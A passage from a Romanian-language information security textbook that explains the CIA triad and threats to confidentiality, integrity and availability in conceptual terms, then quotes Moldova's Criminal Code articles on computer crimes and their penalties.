Un bun exemplu de mecanisme care ne permit să controlam integritatea îl reprezintă
sistemele de fișiere ale multor sisteme de operare moderne, cum ar fi Windows și Linux. În scopul
prevenirii modificărilor neautorizate, astfel de sisteme implementează adesea permisiuni care
restricționează acțiunile pe care un utilizator neautorizat le poate efectua pe un anumit fișier. În
plus, unele astfel de sisteme și numeroase aplicații, cum ar fi bazele de date, ne pot permite să
anulam sau să restabilim modificările nedorite.
Integritatea este deosebit de importantă atunci când se referă la datele care reprezintă
fundamentul pentru unele decizii. Spre exemplu dacă un atacator ar modifica datele care conțineau
rezultatele testelor medicale, s-ar putea ca medicul să prescrie greșit tratamentul, care ar putea duce
la moartea pacientului.
Disponibilitatea înseamnă asigurarea condiţiilor necesare regăsirii şi folosirii cu uşurinţă a
informaţiilor ori de câte ori este nevoie, cu respectarea strictă a condiţiilor de confidenţialitate şi
integritate. Aceasta înseamnă asigurarea utilizatorilor legali cu informaţia completă atunci când
aceştia au nevoie de ea, iar utilizatorii trebuie să aibă acces doar la datele care le sunt destinate.
În contextul triadei CIA Securitatea informației poate fi definită ca ansamblul măsurilor şi
structurilor îndreptate spre protecţia informaţiilor stocate, prelucrate sau transmise prin intermediul
sistemelor informatice și de comunicaţii sau a altor sisteme electronice, precum și împotriva
3
Aureliu Zgureanu. Bazele securității informaționale.
ameninţărilor şi a oricăror acţiuni care pot afecta confidenţialitatea, integritatea și disponibilitatea
informaţiei sau funcţionarea sistemelor informatice, indiferent dacă acestea apar accidental sau
intenţionat.

1.2.2. Autenticitatea, responsabilitatea și non-repudierea


Odată cu atingerea nivelului înalt de informatizare pe care îl are societatea modernă la
conceptele fundamentale care alcătuiesc triada CIA au mai fost alăturate și autenticitatea,
responsabilitatea și non-repudierea, fără de care asigurarea nivelului corespunzător de protecție a
informației devine dificilă.
Autenticitatea este asigurarea că datele, tranzacțiile, comunicațiile sau documentele (în
format electronic sau fizic), sunt autentice. De asemenea, este important de a se valida faptul că
ambele părți implicate sunt cine pretind a fi.
Responsabilitatea este un concept esențial de securitate a informațiilor și înseamnă că
fiecare persoană care lucrează cu un sistem informatic trebuie să aibă responsabilități specifice
pentru asigurarea informațiilor. Sarcinile pentru care o persoană este responsabilă fac parte din
planul general de securitate a informațiilor și sunt ușor de măsurat de către o persoană care are
responsabilitatea managerială pentru asigurarea informațiilor. Un exemplu este declarația de
politică conform căreia toți angajații trebuie să evite instalarea software-ului extern pe o
infrastructură informatică deținută de companie. Persoana responsabilă cu securitatea informațiilor
trebuie să efectueze verificări periodice pentru a se asigura că politica este urmată.
Non-repudierea este o măsură prin care se asigură faptul că, după emiterea sau recepţionarea
unei informaţii într-un sistem de comunicaţii securizat, expeditorul sau destinatarul nu poate nega,
în mod fals, că a expediat sau primit informaţiile în cauză. Non-repudierea îşi propune să confirme
destinatarului unui mesaj electronic faptul că acest mesaj este scris şi trimis de persoana care
pretinde că l-a trimis. În acest fel se asigură încrederea părţilor. Non-repudierea stă la baza
semnăturilor digitale, asigurând autenticitatea acestora.

1.3. Amenințări la adresa securității informației


În acest compartiment vom face cunoștință doar cu noțiunea de amenințare la adresa
securității informației, fiind pus accentul pe amenințări la adresa confidențialității, integrității și
disponibilității, o descrierea mai detaliată și completă fiind dată în compartimentul 9 al acestei cărți.
1.3.1. Noțiune de amenințare la adresa securității informației
Ameninţare pentru securitatea informaţională este intenţia, acţiunea sau inacţiunea,
manifestate real sau potenţial, sau factorul cu caracter ecologic, tehnic sau de alt gen, realizarea sau

4
Aureliu Zgureanu. Bazele securității informaționale.
dezvoltarea căruia contravine sau poate să contravină intereselor legale de bază ale persoanei,
societăţii şi statului în spaţiul informaţional.
Amenințarea este cauza potențială a unui incident nedorit care poate produce daune unui
sistem sau unei organizații (ISO/IEC 27005). O încercare de a pune în aplicare amenințarea se
numește atac, iar cel care face o astfel de încercare – un atacator. Atacatorii potențiali sunt numiți
surse de amenințare.
De obicei amenințarea este un rezultat a vulnerabilității, adică a slăbiciunii unei resurse sau
grup de resurse care poate fi exploatată de una sau mai multe amenințări (de exemplu posibilitatea
accesului persoanelor neautorizate la echipamentul de o importanță majoră sau existența unei erori
în software).
Perioada de la momentul apariției vulnerabilității până la eliminarea ei se numește ciclu de
viață al vulnerabilității. Atât timp cât persistă o vulnerabilitate sunt posibile atacuri asupra
sistemului informatic. Dacă vulnerabilitatea este generată de o eroare de software, atacul este
posibil de la apariția instrumentelor de exploatare a erorii până la înlăturarea acestei erori.
Pentru majoritatea vulnerabilităților perioada activă este relativ mare (câteva zile, uneori –
săptămâni), deoarece în acest timp trebuie să aibă loc următoarele evenimente:
 trebuie să fie cunoscute mijloacele de utilizare a breșei în apărare;
 trebuie să fie fabricat patch-ul1 respectiv;
 patch-ul trebuie să fie aplicat pe sistemul informatic.
Vulnerabilitățile și mijloacele de utilizare ale lor apar încontinuu, ceea ce înseamnă că
prezența lor trebuie verificată tot timpul, iar fabricarea și aplicarea patch-ului respectiv necesită
operativitate maximă.
Amenințările la adresa securității informației pot fi clasificate în conformitate cu mai multe
criterii:
 aspectul securității informației (confidențialitate, disponibilitate, integritate), spre care
amenințările se îndreaptă în primul rând;
 componentele sistemelor informatice, care sunt obiectul amenințărilor (date, software,
echipament, infrastructura);
 metoda de realizare (acțiuni accidentale/intenționate naturale/provocate de om);
 amplasarea sursei amenințării (în interior/afara sistemului).

1
Un patch (în romana plasture) este, de regulă, un mic program prin care se face actualizarea altor programe, se rezolvă
unele erori de funcționare ale programelor ori unele probleme de securitate informatică. De exemplu toate update-urile
diverselor programe sunt patch-uri.
5
Aureliu Zgureanu. Bazele securității informaționale.

1.3.2. Amenințări la adresa confidențialității


Informația confidențială poate fi împărțită în două categorii: informație de serviciu și
informație de domeniu. Informația de serviciu (cum ar fi parolele) nu se referă la un anumit
domeniu, în sistemul informatic acesta joacă un rol tehnic, însă divulgarea ei este deosebit de
periculoasă, deoarece în rezultat se poate obține accesul neautorizat la toate informațiile, inclusiv
cele de domeniu.
Chiar dacă informația este stocată pe calculator sau este destinată utilizării calculatorului,
amenințările la adresa confidențialității ei ar putea să nu fie conexe calculatorului și, în general, ar
putea să nu aibă caracter tehnic.
Mulți dintre noi suntem utilizatorii nu numai a unui sistem informatic, ci a unui șir de
sisteme (servicii informatice). În cazul în care pentru accesul la astfel de sisteme sunt utilizate
parole reutilizabile sau altă informație confidențială, datele vor fi stocate nu numai în memoria
utilizatorului, ci mai probabil și într-o agendă sau pe foi de hârtie, care pot fi lăsate de către
utilizator pe masa de lucru. Este practic imposibil de memorizat mai multe parole diferite;
recomandările pentru o schimbare regulată a lor doar agravează situația, utilizatorul fiind impus să
utilizeze diverse scheme necomplicate de alternare a parolelor sau chiar poate încerca să le reducă
la două sau trei parole care sunt ușor de ținut minte și care pot fi ghicite.
Vulnerabilitățile expuse sunt caracterizate de amplasarea datelor confidențiale într-un mediu
care nu se bucură de o protecție adecvată. Același caracter îl are și transferul de date confidențiale
în clar (în conversație, într-o scrisoare, în rețea), ceea ce face posibilă interceptarea lor. Pentru
atacuri pot fi utilizate diverse mijloace tehnice (interceptarea convorbirilor, interceptarea pasivă în
rețea, etc.).
Interceptarea datelor este o amenințare foarte gravă, iar în cazul în care confidențialitatea
este cu adevărat critică și datele sunt transmise prin canale multiple, protecția lor poate fi foarte
dificilă și costisitoare. Mijloace tehnice de interceptare sunt bine concepute, disponibile, simple în
utilizare și ușor de instalat.
Furtul de echipamente de asemenea este o amenințare a confidențialității. Atât pentru
unitățile de stocare externe, cât și pentru calculatoare în general, în special cele portabile.
O amenințare periculoasă a confidențialității ce nu ține de metodele tehnice este mascarada –
realizarea de activități sub masca unei persoane cu autoritatea de acces la date.
Abuzul de putere este o amenințare de care este dificil de protejat. În multe tipuri de sisteme
utilizatorul privilegiat (administratorul de sistem), are posibilitatea de a citi orice fișier (necriptat),
poate avea acces la e-mailul oricărui utilizator, etc. Un alt exemplu constă în cauzarea daunelor în

6
Aureliu Zgureanu. Bazele securității informaționale.
timpul deservirilor tehnice. În mod normal, inginerul de la service primește acces nelimitat la
echipament și este capabil de a ocoli mecanismele de protecție ale software-ului.
1.3.3. Amenințări la adresa integrității
Integritatea poate fi statică, în sensul imutabilității componentelor informatice, și dinamică,
care se referă la aplicarea corectă a acțiunilor complexe (tranzacții). Amenințări ale integrității
dinamice sunt încălcarea tranzacțiilor atomice2, reordonarea, furtul, duplicarea datelor sau
introducerea de mesaje suplimentare (pachete de rețea, etc.). Mijloacele de control ale integrității
dinamice se aplică în special la analiza fluxului de mesaje financiare.
Acțiunile corespunzătoare ale răuvoitorilor într-un mediu de rețea în scopul de a încălca
integritatea dinamică poartă denumirea de interceptare activă.
Printre acțiunile răuvoitorului (de obicei, membrul al personalului) în scopul de a încălca
integritatea statică se numără introducerea datelor incorecte sau modificarea datelor.
Pot fi falsificate de exemplu antetele de e-mail, întreg mesajul poate fi falsificat de către o
persoană care cunoaște parola. Acest lucru este posibil chiar și atunci când pentru integritate se
folosesc mijloace criptografice. Aici are loc o interacțiune a diferitelor aspecte ale securității
informației: în cazul în care se încălcă confidențialitatea, poate fi afectată integritatea. O amenințare
a integrității este nu numai falsificarea sau modificarea datelor, dar, de asemenea, și negarea actelor
comise, adică repudierea. În acest scop trebuie alocate resurse și pentru asigurarea „non-repudierii”.
Integritatea este cel mai important aspect al securității informațiilor în cazurile în care
informația este o instrucțiune sau un ghid pentru unele acțiuni exacte. Compoziția medicamentelor,
setul și caracteristicile componentelor unor produse, parcursul procesului tehnologic - sunt exemple
de informație, încălcarea integrității căreia nu este permisă. Este dezagreabilă și denaturarea
informației oficiale, fie textul unei legi sau pagina web a serverului oricărei organizații
guvernamentale.
Sunt potențial vulnerabile din punct de vedere al încălcării integrității nu doar date, ci și
aplicațiile software. Instalarea software-ului rău intenționat este un exemplu al unei astfel de
încălcări.

1.3.4. Amenințări la adresa disponibilității


Sistemele informatice sunt create pentru servicii informatice specifice. Dacă dintr-un motiv
sau altul este imposibilă furnizarea acestor servicii, aceasta va provoca daune utilizatorilor,
prestatorilor de servicii și dezvoltatorilor. Din aceste motive disponibilitatea poate fi numită cel mai
important element al securității informației. Rolul primordial al disponibilității se manifestă în

2
Caracterul atomic reprezintă proprietatea „tot sau nimic”. O tranzacţie atomică este o unitate indivizibilă, care ori este
efectuată în întregime, ori nu este efectuată de loc;
7
Aureliu Zgureanu. Bazele securității informaționale.
deosebi în sistemele de gestiune a producției, a transportului etc. Aparent mai puțin dramatice, însă
la fel de periculoase pot fi consecințele (atât materiale cât și cele morale) indisponibilității pe
termen lung ale serviciilor informatice destinate unui număr mare de oameni (vânzarea biletelor la
tren sau avion, servicii bancare etc.).
Erorile neintenționate ale utilizatorilor ce fac parte din personalul întreprinderii, ale
operatorilor, administratorilor de sistem, și altor persoane care deservesc sistemele informatice sunt
destul de frecvente, iar unele dintre aceste erori sunt de fapt amenințări (datele introduse incorect
sau o eroare în program care a cauzat prăbușirea sistemului). Uneori aceste erori (care sunt de
obicei administrative) creează vulnerabilități pe care atacatorii le pot utiliza. Modul cel mai radical
de a lupta cu erorile neintenționate este automatizarea maximă și un control strict.
Alte amenințări ale disponibilității pot fi clasificate după componentele sistemului
informatic la care se referă amenințarea:
1. refuzul utilizatorului;
2. defectul intern al sistemului informatic;
3. refuzul infrastructurii sistemului.
Referitor la refuzul utilizatorilor de obicei sunt prezente următoarele amenințări:
 refuzul de a lucra cu sistemul informatic (cel mai adesea manifestat în necesitatea de
a învăța noile posibilități ale sistemului sau în discrepanțele între cerințele clientului
și capacitățile reale ale sistemului și caracteristicile tehnice ale lui);
 incapacitatea de a lucra cu sistemul din cauza lipsei de pregătire corespunzătoare
(lipsa generală de cunoaștere a calculatorului, incapacitatea de a interpreta mesajele
de diagnostic, incapacitatea de a lucra cu documentația etc.);
 incapacitatea de a lucra cu sistemul din cauza lipsei de suport tehnic (documentația
incompletă, lipsa de informații de fond etc.).
Principalele surse ale defectului intern al sistemului sunt:
 devierea (accidentală sau intenționată) de la normele stabilite de funcționare;
 ieșirea sistemului din modul normal de funcționare ca urmare a acțiunilor accidentale
sau intenționate ale utilizatorilor sau a personalului de întreținere (creșterea
numărului estimat de cereri, volumul excesiv de informații prelucrate, etc.);
 erorile în configurația sistemului;
 defecțiuni hardware și software;
 distrugerea datelor;
 distrugerea sau deteriorarea echipamentului.
În ceea ce privește infrastructura este recomandat să luăm în considerare următoarele
amenințări:
8
Aureliu Zgureanu. Bazele securității informaționale.
 perturbări (accidentale sau intenționate) ale sistemelor de comunicații, de alimentare
cu energie electrică sau termică, apă, aer condiționat;
 distrugerea sau deteriorarea încăperilor;
 incapacitatea sau refuzul personalului și/sau utilizatorilor de a-și îndeplini sarcinile
(tulburări civile, accidente de transport, atac terorist sau amenințarea cu atac, grevă,
etc.).
De asemenea sunt periculoși și foștii sau actualii angajați “ofensați”, care potențial pot cauza
prejudicii organizației - “contravenientului”, cum ar fi de exemplu:
 deteriorarea echipamentului;
 încorporarea unei bombe logice care în cele din urmă va duce la distrugerea
sistemului și/sau a datelor;
 ștergerea datelor.
Angajații “ofensați”, fie ei și foști angajați, sunt familiarizați cu ordinea interioară a
organizației și pot provoca daune considerabile. Trebuie de avut grijă ca atunci când un angajat este
concediat drepturile sale de acces (logic și fizic) la resursele informaționale sunt anulate.
Sunt periculoase de asemenea și dezastrele naturale și evenimentele percepute ca fiind
dezastre naturale - incendiile, inundațiile, cutremurele, uraganele.
Amenințările disponibilității se pot dovedi destul de dure, cum este de exemplu deteriorarea
sau chiar distrugerea echipamentului. Astfel de daune pot fi provocate de cauze naturale (de multe
ori - de furtuni), sunt periculoase scurgerile sistemelor de instalații sanitare și de încălzire,
insuficiența aerului condiționat în cazul căldurii extreme. Este binecunoscut că trebuie de făcut
periodic copii de rezervă a datelor. Cu toate acestea, chiar și în cazul în care copiile sunt făcute, ele
sunt adesea depozitate neglijent.
Un mijloc de a perturba regimul normal de funcționare al sistemului poate fi consumul
agresiv de resurse (de obicei – a benzii de rețea, a puterii de lucru a procesoarelor sau a memoriei
operative). În funcție de localizarea sursei amenințării un astfel de consum poate fi local sau la
distanță. În cazul unor erori de configurare a sistemului o aplicație software locală poate practic
monopoliza procesorul și/sau memoria fizică, reducând viteza altor aplicații la zero, sau de
exemplu, numărul de utilizatori conectați la sistem care este limitat de resurse. Un exemplu de
consum de resurse la distanță sunt atacurile DoS – refuzul serviciului.
Metodele de protecţie specifice tehnologiei informației din ziua de astăzi sunt variate,
depinzând de tipul de vulnerabilităţi spre care sunt orientate. Soluţiile date de programele antivirus,
antispam, antispyware, echipamentele sau programele de tip firewall, VPN, programele de detecţie
şi prevenire a intruziunii (IDS, IPS) sau criptarea informaţiei sunt metode folosite pe scară largă de
toţi cei care sunt conştienţi de riscurile comunicaţiilor în epoca modernă.
9
Aureliu Zgureanu. Bazele securității informaționale.
Dat fiind faptul că procesul de asigurare a securității informaţiei este o componentă esenţială
a societăţii informaţionale, au fost elaborate standarde internaţionale specifice conexe securității
informațiilor. Unele dintre cele mai importante standarde de acest tip se conțin în familia
standardelor de securitate ISO 27000 și au scopul de a ajuta organizațiile să obțină un nivel cat mai
ridicat al securității informaționale.

Întrebări și subiecte pentru aprofundarea cunoștințelor și lucrul individual


1. Care sunt cele trei obiective primare din domeniul securității informațiilor (CIA)? Ce
înseamnă fiecare dintre ele?
2. Descrieți o situație eventuală de compromitere a integrității, confidențialității,
disponibilității și non-repudierii. Care ar putea fi urmările acestor compromiteri?
3. Definiți Securitatea informației din punctul de vedere a triadei CIA.
4. Ce este o amenințare la adresa securității informației din punctul de vedere al
ISO/IEC 27005?
5. Faceți o descriere generală a amenințărilor la adresa triadei CIA. Subliniați cele mai
importante momente.
6. Faceți o descriere a amenințărilor la adresa autenticității, responsabilității și non-
repudierii.

10
Aureliu Zgureanu. Bazele securității informaționale

TEMA 2: ASPECTE JURIDICE PRIVIND PROTECŢIA ȘI SECURITATEA


INFORMAȚIEI

Obiectivele temei:
 Familiarizarea cu noțiunile generale ale aspectului legislativ de protecție a informației.
 Familiarizarea cu conținutul actelor legislative ale RM referitor la infracţiunilor informatice
şi a infracţiunilor în domeniul telecomunicaţiilor.
 Descierea legislației referitoare la Secretul de stat și secretul comercial.
 Prezentarea altor acte legislative conexe securității informaționale.
 Analiza succintă a proiectului Concepţiei securităţii informaţionale a Republicii Moldova.

Cuvinte-cheie:
Constituţia RM, secretul de stat,
Codul penal al RM, secretul comercial,
măsuri cu scop restrictiv, Legea comunicațiilor
măsuri cu scop creativ electronice,
infracţiuni informatice, Securitatea informaţională
infracţiuni în domeniul a RM.
telecomunicaţiilor,

Aspectul legislativ are o importanță majoră în procesul de asigurare a securității informației.


Majoritatea oamenilor nu comit infracțiuni legate de securitatea informației nu din cauza că din
punct de vedere tehnic ele nu sunt posibile, ci deoarece aceste acțiuni contravin bunului simț, ele
sunt condamnate de societate sau chiar pedepsite.

2.1. Noțiuni generale ale aspectului legislativ de protecție a informației


La nivelul legislativ de asigurare a securității informației putem evidenția două grupe de
măsuri:
 măsuri cu scop restrictiv, adică măsuri care vizează crearea și menținerea în societate
unei atitudini negative (inclusiv cu utilizarea sancțiunilor) față de infracțiunile din
domeniul securității informațiilor și autorii acestora;
 măsuri cu scop creativ, adică măsuri de ghidare și coordonare care îmbunătățesc educația
societății în domeniul securității informațiilor și care contribuie la dezvoltarea și
distribuirea instrumentelor și mijloacelor de asigurare a securității informației.
În practică ambele grupuri de măsuri sunt la fel de importante, însă este necesar de subliniat
aspectul respectării conștiente a normelor și reglementărilor de securitate a informațiilor. Aceasta
este important pentru toți participanții procesului informațional, deoarece ar fi naiv să credem că ne
1
Aureliu Zgureanu. Bazele securității informaționale

putem baza doar pe protecția organelor de aplicare a legii. Pentru cei a căror datorie este de a
pedepsi infractorii la fel este importantă cunoașterea și respectarea acestor norme și reglementări,
deoarece asigurarea concludenței în timpul anchetei și a procesului în instanță, legat de
criminalitatea informatică, este imposibilă fără o pregătire specială.
Legea Supremă a Republicii Moldova este Constituţia RM, care a fost adoptată la data de 29
iulie 1994. Prin Constituție, în conformitate cu Articolul 34, avem Dreptul la informație. În acest
articol în particular este garantat:
(1) Dreptul persoanei de a avea acces la orice informație de interes public nu poate fi
îngrădit.
(2) Autoritățile publice, potrivit competențelor ce le revin, sunt obligate să asigure
informarea corecta a cetățenilor asupra treburilor publice și asupra problemelor de
interes personal.
(3) Dreptul la informație nu trebuie să prejudicieze măsurile de protecție a cetățenilor sau
siguranța națională.
Articolul 30 al Constituției RM garantează Secretul corespondenței:
(1) Statul asigură secretul scrisorilor, al telegramelor, al altor trimiteri poștale, al
convorbirilor telefonice și al celorlalte mijloace legale de comunicare.
(2) De la prevederile alineatului (1) se poate deroga prin lege în cazurile când această
derogare este necesară în interesele securității naționale, bunăstării economice a țării,
ordinii publice și în scopul prevenirii infracțiunilor.
Actul legislativ care cuprinde norme de drept ce stabilesc principiile şi dispoziţiile generale
şi speciale ale dreptului penal, determină faptele ce constituie infracţiuni şi prevede pedepsele ce se
aplică infractorilor este Codul penal al RM, care a fost publicat la 14.04.2009 în Monitorul Oficial
Nr. 72-74. Codul penal se aplică în conformitate cu prevederile Constituţiei Republicii Moldova şi
ale actelor internaţionale la care Republica Moldova este parte.
Articolul 180 al Codului penal Încălcarea intenţionată a legislaţiei privind accesul la
informaţie prevede:
Încălcarea intenţionată de către o persoană cu funcţie de răspundere a procedurii legale de
asigurare şi de realizare a dreptului de acces la informaţie, încălcare ce a cauzat daune în
proporţii considerabile drepturilor şi intereselor ocrotite de lege ale persoanei care a solicitat
informaţii referitoare la ocrotirea sănătăţii populaţiei, la securitatea publică, la protecţia
mediului,

2
Aureliu Zgureanu. Bazele securității informaționale

se pedepseşte cu amendă de la 150 la 300 unităţi convenţionale cu (sau fără) privarea


de dreptul de a ocupa anumite funcţii sau de a exercita o anumită activitate pe un
termen de până la 3 ani.

2.2. Infracţiuni informatice şi infracţiuni în domeniul telecomunicaţiilor


Pedepsele pentru infracţiuni informatice şi infracţiuni în domeniul telecomunicaţiilor sunt
stipulate în Capitolul XI al Codului penal și cuprinde articolele:
 Articolul 259. Accesul ilegal la informaţia computerizată.
 Articolul 260. Producerea, importul, comercializarea sau punerea ilegală la dispoziţie a
mijloacelor tehnice sau produselor program.
 Articolul 2601. Interceptarea ilegală a unei transmisii de date informatice.
 Articolul 2602. Alterarea integrităţii datelor informatice ţinute într-un sistem informatic.
 Articolul 2603. Perturbarea funcţionării sistemului informatic.
 Articolul 2604. Producerea, importul, comercializarea sau punerea ilegală la dispoziţie a
parolelor, codurilor de acces sau a datelor similare.
 Articolul 2605. Falsul informatic.
 Articolul 2606. Frauda informatică.
 Articolul 261. Încălcarea regulilor de securitate a sistemului informatic.
 Articolul 2611. Accesul neautorizat la reţelele şi serviciile de telecomunicaţii.

2.2.1. Accesul ilegal la informaţia computerizată


Articolul 259:
(1) Accesul ilegal la informaţia computerizată, adică la informaţia din calculatoare, de pe
suporţii materiali de informaţie, din sistemul sau reţeaua informatică, al unei persoane care
nu este autorizată în temeiul legii sau al unui contract, depăşeşte limitele autorizării ori nu
are permisiunea persoanei competente să folosească, să administreze sau să controleze un
sistem informatic ori să desfăşoare cercetări ştiinţifice sau să efectueze orice altă operaţiune
într-un sistem informatic, dacă este însoţit de distrugerea, deteriorarea, modificarea, blocarea
sau copierea informaţiei, de dereglarea funcţionării calculatoarelor, a sistemului sau a reţelei
informatice şi dacă a cauzat daune în proporţii mari,
se pedepseşte cu amendă în mărime de la 200 la 500 unităţi convenţionale sau cu
muncă neremunerată în folosul comunităţii de la 150 la 200 de ore, sau cu închisoare
de până la 2 ani, cu amendă, aplicată persoanei juridice, în mărime de la 1000 la
3000 unităţi convenţionale cu privarea de dreptul de a exercita o anumită activitate.
(2) Aceeaşi acţiune săvârşită:
3
Aureliu Zgureanu. Bazele securității informaționale

a) de două sau mai multe persoane;


b) cu violarea sistemelor de protecţie;
c) cu conectarea la canalele de telecomunicaţii;
d) cu folosirea unor mijloace tehnice speciale;
e) cu utilizarea ilegală a calculatorului, sistemului sau reţelei informatice, în scopul săvârşirii
uneia dintre infracţiunile prevăzute la alin.(1), la art.2601–2603, 2605 şi 2606;
f) în privinţa informaţiei protejată de lege;
g) în proporţii deosebit de mari,
se pedepseşte cu amendă în mărime de la 500 la 1000 unităţi convenţionale sau cu
muncă neremunerată în folosul comunităţii de la 180 la 240 de ore, sau cu închisoare
de până la 3 ani, iar persoana juridică se pedepseşte cu amendă în mărime de la 3000
la 6000 unităţi convenţionale cu privarea de dreptul de a exercita o anumită activitate
sau cu lichidarea persoanei juridice.
2.2.2. Operații ilegale cu mijloace tehnice sau produse program
Articolul 260. Producerea, importul, comercializarea sau punerea ilegală la dispoziţie a
mijloacelor tehnice sau produselor program:
Producerea, importul, comercializarea sau punerea la dispoziţie, sub orice altă formă, în mod
ilegal, a mijloacelor tehnice sau produselor program, concepute sau adaptate, în scopul
săvârşirii uneia dintre infracţiunile prevăzute la art.237, 259, 2601–2603, 2605 şi 2606,
se pedepseşte cu amendă în mărime de la 500 la 1000 unităţi convenţionale sau cu
închisoare de la 2 la 5 ani, cu amendă, aplicată persoanei juridice, în mărime de la
3000 la 6000 unităţi convenţionale cu privarea de dreptul de a exercita o anumită
activitate sau cu lichidarea întreprinderii.
2.2.3. Interceptarea ilegală a unei transmisii de date informatice
Articolul 2601:
Interceptarea ilegală a unei transmisii de date informatice (inclusiv a unei emisii electronice)
care nu sunt publice şi care sunt destinate unui sistem informatic, provin dintr-un asemenea
sistem sau se efectuează în cadrul unui sistem informatic,
se pedepseşte cu amendă în mărime de la 500 la 1000 unităţi convenţionale sau cu
închisoare de la 2 la 5 ani, cu amendă, aplicată persoanei juridice, în mărime de la
3000 la 6000 unităţi convenţionale cu privarea de dreptul de a exercita o anumită
activitate sau cu lichidarea întreprinderii.
2.2.4. Alterarea integrităţii datelor informatice
Articolul 2602. Alterarea integrităţii datelor informatice ţinute într-un sistem informatic:

4
Aureliu Zgureanu. Bazele securității informaționale

Modificarea, ştergerea sau deteriorarea intenţionată a datelor informatice ţinute într-un


sistem informatic ori restricţionarea ilegală a accesului la aceste date, transferul neautorizat
de date informatice dintr-un sistem informatic, dintr-un mijloc de stocare, dobândirea,
comercializarea sau punerea la dispoziţie, sub orice formă, a datelor informatice cu acces
limitat, dacă aceste acţiuni au cauzat daune în proporţii mari,
se pedepsesc cu amendă în mărime de la 500 la 1000 unităţi convenţionale sau cu
închisoare de la 2 la 5 ani.
2.2.5 Perturbarea funcţionării sistemului informatic
Articolul 2603:
(1) Perturbarea funcţionării unui sistem informatic prin introducerea, transmiterea,
modificarea, ştergerea sau deteriorarea datelor informatice sau prin restricţionarea accesului
la aceste date, dacă aceste acţiuni au cauzat daune în proporţii mari,
se pedepseşte cu amendă în mărime de la 700 la 1000 unităţi convenţionale sau cu
muncă neremunerată în folosul comunităţii de la 150 la 200 de ore, sau cu închisoare
de la 2 la 5 ani, cu amendă, aplicată persoanei juridice, în mărime de la 3000 la 6000
unităţi convenţionale cu privarea de dreptul de a exercita o anumită activitate sau cu
lichidarea întreprinderii.
(2) Aceeaşi acţiune:
a) săvârşită din interes material;
b) săvârşită de două sau mai multe persoane;
c) săvârşită de un grup criminal organizat sau de o organizaţie criminală;
d) care a cauzat daune în proporţii deosebit de mari,
se pedepseşte cu amendă în mărime de la 700 la 1000 unităţi convenţionale sau cu
închisoare de la 3 la 7 ani, cu amendă, aplicată persoanei juridice, în mărime de la
3000 la 6000 unităţi convenţionale sau cu lichidarea întreprinderii.

2.2.6. Operații frauduloase cu parole, coduri de acces sau date similare


Articolul 2604. Producerea, importul, comercializarea sau punerea ilegală la dispoziţie a
parolelor, codurilor de acces sau a datelor similare:
(1) Producerea, importul, comercializarea sau punerea la dispoziţie, sub orice altă formă, în
mod ilegal, a unei parole, a unui cod de acces sau a unor date similare care permit accesul
total sau parţial la un sistem informatic în scopul săvârşirii uneia dintre infracţiunile
prevăzute la art.237, 259, 2601–2603, 2605 şi 2606, dacă aceste acţiuni au cauzat daune în
proporţii mari,

5
Aureliu Zgureanu. Bazele securității informaționale

se pedepsesc cu amendă în mărime de la 500 la 1000 unităţi convenţionale sau cu


închisoare de la 2 la 5 ani, cu amendă, aplicată persoanei juridice, în mărime de la
1000 la 3000 unităţi convenţionale cu privarea de dreptul de a exercita o anumită
activitate.
(2) Aceleaşi acţiuni:
a) săvârşite din interes material;
b) săvârşite de două sau mai multe persoane;
c) săvârşite de un grup criminal organizat sau de o organizaţie criminală;
d) care au cauzat daune în proporţii deosebit de mari,
se pedepsesc cu amendă în mărime de la 1000 la 1500 unităţi convenţionale sau cu
închisoare de la 3 la 7 ani, cu amendă, aplicată persoanei juridice, în mărime de la
3000 la 6000 unităţi convenţionale cu privarea de dreptul de a exercita o anumită
activitate sau cu lichidarea întreprinderii.

2.2.7. Falsul informatic și frauda informatică


Articolul 2605. Falsul informatic:
Introducerea, modificarea sau ştergerea ilegală a datelor informatice ori restricţionarea
ilegală a accesului la aceste date, rezultând date necorespunzătoare adevărului, în scopul de
a fi utilizate în vederea producerii unei consecinţe juridice,
se pedepsesc cu amendă în mărime de la 1000 la 1500 unităţi convenţionale sau cu
închisoare de la 2 la 5 ani.
Articolul 2606. Frauda informatică:
(1) Introducerea, modificarea sau ştergerea datelor informatice, restricţionarea accesului la
aceste date ori împiedicarea în orice mod a funcţionării unui sistem informatic, în scopul de
a obţine un beneficiu material pentru sine sau pentru altul, dacă aceste acţiuni au cauzat
daune în proporţii mari,
se pedepsesc cu amendă în mărime de la 1000 la 1500 unităţi convenţionale sau cu
muncă neremunerată în folosul comunităţii de la 150 la 200 de ore, sau cu închisoare
de la 2 la 5 ani.
(2) Aceleaşi acţiuni:
a) săvârşite de un grup criminal organizat sau de o organizaţie criminală;
b) care au cauzat daune în proporţii deosebit de mari,se pedepsesc cu închisoare de la
4 la 9 ani.

6
Aureliu Zgureanu. Bazele securității informaționale

2.2.8. Încălcarea regulilor de securitate a sistemului informatic


Articolul 261:
Încălcarea regulilor de colectare, prelucrare, păstrare, difuzare, repartizare a informaţiei ori a
regulilor de protecţie a sistemului informatic, prevăzute în conformitate cu statutul
informaţiei sau gradul ei de protecţie, dacă această acţiune a contribuit la însuşirea,
denaturarea sau la distrugerea informaţiei ori a provocat alte urmări grave,
se pedepseşte cu amendă în mărime de până la 400 unităţi convenţionale sau cu
muncă neremunerată în folosul comunităţii de la 200 la 240 de ore, sau cu închisoare
de până la 2 ani, în toate cazurile cu (sau fără) privarea de dreptul de a ocupa anumite
funcţii sau de a exercita o anumită activitate pe un termen de la 2 la 5 ani, iar
persoana juridică se pedepseşte cu amendă în mărime de la 1.000 la 3.000 unităţi
convenţionale cu privarea de dreptul de a exercita o anumită activitate.

2.2.9. Accesul neautorizat la reţelele şi serviciile de telecomunicaţii


Articolul 2611:
(1) Accesul neautorizat la reţelele şi/sau serviciile de telecomunicaţii cu utilizarea reţelelor
şi/sau serviciilor de telecomunicaţii ale altor operatori, dacă acesta a cauzat daune în
proporţii mari,
se pedepseşte cu amendă în mărime de la 500 la 1000 unităţi convenţionale sau cu
închisoare de până la 1 an, iar persoana juridică se pedepseşte cu amendă în mărime
de la 1.000 la 3.000 unităţi convenţionale cu privarea de dreptul de a exercita o
anumită activitate.
(2) Aceeaşi acţiune:
a) săvârşită de două sau mai multe persoane;
b) săvârşită cu violarea sistemelor de protecţie;
c) săvârşită cu folosirea mijloacelor tehnice speciale;
d) care a cauzat daune în proporţii deosebit de mari,
se pedepseşte cu amendă în mărime de la 1.000 la 3.000 unităţi convenţionale sau cu
închisoare de până la 5 ani, iar persoana juridică se pedepseşte cu amendă în mărime
